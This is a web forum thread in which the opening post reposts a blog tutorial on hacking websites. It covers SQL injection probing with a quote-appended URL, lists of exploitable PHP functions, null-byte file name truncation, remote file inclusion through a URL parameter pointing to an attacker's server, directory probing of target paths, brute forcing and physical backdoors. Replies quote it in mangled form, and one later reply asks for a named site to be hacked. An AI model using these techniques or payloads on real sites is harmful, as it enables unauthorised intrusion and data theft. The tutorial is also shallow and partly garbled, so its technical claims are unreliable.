Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,158,231 members, 7,836,112 topics. Date: Tuesday, 21 May 2024 at 08:56 PM

How To Hack A Website Successfully - Webmasters - Nairaland

Nairaland Forum / Science/Technology / Webmasters / How To Hack A Website Successfully (1983 Views)

Strategies To Consider Before You Can Monetize Your Website Successfully / How To Hack Secured, Password Protected Wi-fi, Hotspot Networks On Pc (2) (3) (4)

(1) (Reply) (Go Down)

How To Hack A Website Successfully by Nobody: 7:55pm On Oct 29, 2016
Why you should learn how to Hack Website?

Learning how to hack website doesn’t mean you should use the skill in doing bad to other people’s website as you are doing this at your own risk if you get caught. Although there are classifications of hackers which either makes you look good or look bad as you may either be a Black hat, White hat, Grey hat, Script kiddie, Hacktivist, Phreaker depending on your choice.

Hack website

And for those who are web developers or have lots of social data stored online, you may sometimes find yourself in a situation where you may fall victim to hackers and gaining control back might seem hard unless you have an in-dept knowledge on how to protect yourself and not fall victim anymore.
So How can you Hack a Website?

There are lots of tutorials and books on how to do this on the internet but getting the right one to begin with usually becomes hard to understand and making a mistake using the right tool.If you ready to learn then this post is for you, but today i want to share something that i honestly think will be useful for you as what i will show you will be entirely different from others, And i can bet that at the end you should be able to hack any website.

Below are my compiled list you can try to use:
SQL-Injection

SQL injection can simply be defined as a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution, from my personal experience this is the most popular issue you will find on most websites, and the basic problem is that most of these websites put those information in a database and forget to filter them.

Hack website

So when you echo back, the javascript message should be shown, If they are just logged the last part should cause a SQL error which might give us a lot of useful information concerning the website. You can try the following and add the /’/ website.com/users.php?id=1′ if it shows an error then you are ready to begin hacking.

Recommended: Python- Making A Simple SQL Injection Vulnerablity Tester Tool

Exploitable PHP Functions

Code Execution:
require() – reads a file and interprets content as PHP code
include() – reads a file and interprets content as PHP code
eval() – interpret string as PHP code
pregreplace() – if it uses the /e modifier it interprets the replacement string as PHP code

Command Execution:
exec() – executes command + returns last line of its output
passthru() – executes command + returns its output to the remote browser
(backticks) – executes command and returns the output in an array
shellexec – executes command + returns output as string
system() – executes command + returns its output (much the same as passthru())
.can’t handle binary data
popen() – executes command + connects its output or input stream to a PHP file descriptor

File Disclosure:
fopen() – opens a file and associates it with a PHP file descriptor
readfile() – reads a file and writes its contents directly to the remote browser
file() – reads an entire file into an array
filegetcontents() – reads file into a string

NULL Bytes

Lets assume that they have a script that takes the .txt extension which is inserted at the end and by doing this, The programmer makes sure that only the file format can be opened and nothing else.

But what about a filename like this:
phppage.php%00
It will get to:
phppage.php%00.txt
So fopen opens phppage.php%00.txt.

The fopen functions stops after “.php” which is before the NULL Byte and opens only the “phppage.php”. So that every type of file can be opened. Also,Scripts that allow uploads (but only for a certain file type) are also a potential target for this type of attack.

Remote Files Inclusion

File inclusion vulnerability is a type of vulnerability often found on websites. It allows an attacker to include a file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. Written below is a piece of php code that can open a file.
<?php
if (!($hfile = fopen(“$file”, “r”))
echo(“error cant open the file: $file<br />\n”);
?> This example opens the file with the name specified in the user input ($file).
That means it opens every file an attacker want to open and if allowurlfopen is ON even remote files.
Look for example at this piece of code:
Example:

<?php
include($dir . “/members.php”);
?>

Just create a file .members.php on your web server and call the script like this:
dir=http://www.server.com/

It will execute your file on the target server. But it is important you switch off PHP or the code will get executed on your server.

Directory Listing

Index browsing can be very useful when trying to find files you can’t see normally like the password files, files used to administrate the web page, log files, any files where data gets stored.

You can also manually check for suspicious urls like below:
target.com/logs/
target.com/files/
target.com/sql/
target.com/secret/

You can also get tools that easily do these for you but you can check them on the internet.

Brute Forcing

Brute force (also known as brute force cracking) is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies.Hack website

You can also check google on great tools used for brute-forcing with the password database.

Recommended: Become a Hacker With these 20 Tips For Beginners

Physical Access

If you are able to gain physical access to the server then you can go discrete and use a backdoor attack on the web server. This works most times.

And there are lots of other methods which you could use as the list is endless both for beginners and Pros. you just need to discover the right one. I have also attached some pdf books about hacking websites which i highly recommend;

Source: http://khalidsblog.com/hack-website-successfully/

1 Like

Re: How To Hack A Website Successfully by edebemba(m): 8:13pm On Oct 29, 2016
Are you a hacker? What is the name of your group?
Re: How To Hack A Website Successfully by BIDOO(m): 8:14pm On Oct 29, 2016
supersonic1:

Learning how to hack website doesn’t mean you should use the skill in doing bad to other people’s website as you are doing this at your own risk if you get caught. Although there are classifications of hackers which either makes you look good or look bad as you may either be a Black hat, White hat, Grey hat, Script kiddie, Hacktivist, Phreaker depending on your choice.

Hack website

And for those who are web developers or have lots of social data stored online, you may sometimes find yourself in a situation where you may fall victim to hackers and gaining control back might seem hard unless you have an in-dept knowledge on how to protect yourself and not fall victim anymore.

There are lots of tutorials and books on how to do this on the internet but getting the right one to begin with usually becomes hard to understand and making a mistake using the right tool.If you ready to learn then this post is for you, but today i want to share something that i honestly think will be useful for you as what i will show you will be entirely different from others, And i can bet that at the end you should be able to hack any website.

SQL-Injection

SQL injection can simply be defined as a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution, from my personal experience this is the most popular issue you will find on most websites, and the basic problem is that most of these websites put those information in a database and forget to filter them.

Hack website

So when you echo back, the javascript message should be shown, If they are just logged the last part should cause a SQL error which might give us a lot of useful information concerning the website. You can try the following and add the /’/ website.com/users.php?id=1′ if it shows an error then you are ready to begin hacking.

Code Execution:
pregreplace() – if it uses the /e modifier it interprets the replacement string as PHP code

Command Execution:
popen() – executes command + connects its output or input stream to a PHP file descriptor

File Disclosure:
readfile() – reads a file and writes its contents directly to the remote browser

NULL Bytes

Lets assume that they have a script that takes the .txt extension which is inserted at the end and by doing this, The programmer makes sure that only the file format can be opened and nothing else.

phppage.php%00
It will get to:
phppage.php%00.txt

The fopen functions stops after “.php” which is before the NULL Byte and opens only the “phppage.php”. So that every type of file can be opened. Also,Scripts that allow uploads (but only for a certain file type) are also a potential target for this type of attack.

Remote Files Inclusion

File inclusion vulnerability is a type of vulnerability often found on websites. It allows an attacker to include a file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. Written below is a piece of php code that can open a file.
<?php
?> This example opens the file with the name specified in the user input ($file).
That means it opens every file an attacker want to open and if allowurlfopen is ON even remote files.
Example:

<?php
?>

Just create a file .members.php on your web server and call the script like this:

It will execute your file on the target server. But it is important you switch off PHP or the code will get executed on your server.

Directory Listing

Index browsing can be very useful when trying to find files you can’t see normally like the password files, files used to administrate the web page, log files, any files where data gets stored.

target.com/logs/
target.com/files/
target.com/sql/
target.com/secret/

You can also get tools that easily do these for you but you can check them on the internet.

Brute Forcing

Brute force (also known as brute force cracking) is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies.Hack website

You can also check google on great tools used for brute-forcing with the password database.

Physical Access

If you are able to gain physical access to the server then you can go discrete and use a backdoor attack on the web server. This works most times.

And there are lots of other methods which you could use as the list is endless both for beginners and Pros. you just need to discover the right one. I have also attached some pdf books about hacking websites which i highly recommend;

Kudos bro, am a learner and i will like to know this hacking stuff, pls kindly link me up with ur whatapp number.
Thanks
Re: How To Hack A Website Successfully by Nobody: 8:24pm On Oct 29, 2016
edebemba:
Are you a hacker? What is the name of your group?

I don't have a group about hacking. If you want to know anything then you can hit me up on my blog
Re: How To Hack A Website Successfully by Nobody: 8:26pm On Oct 29, 2016
BIDOO:

Kudos bro, am a learner and i will like to know this hacking stuff, pls kindly link me up with ur whatapp number.
Thanks

You can email me on anything you wanna know smiley
Re: How To Hack A Website Successfully by pimplucious: 8:28pm On Oct 29, 2016
M
Re: How To Hack A Website Successfully by Nobody: 12:53pm On May 10, 2017
supersonic1:

Hack website

SQL-Injection

Hack website

Code Execution:

Command Execution:

File Disclosure:

NULL Bytes

phppage.php%00
It will get to:
phppage.php%00.txt

Remote Files Inclusion

<?php
Example:

<?php
?>

Directory Listing

target.com/logs/
target.com/files/
target.com/sql/
target.com/secret/

Brute Forcing

Physical Access

Abeg help me hack this useless site called GCCH. How can you have so much money and can't withdraw a kobo?

(1) (Reply)

Acquisition Of Webhosting Company / Naija Adsense With $46.97 For Sale @ N30k(its Verified)(click To See Proof) / Who Can Teach Me Laravel In Lagos

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 49
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.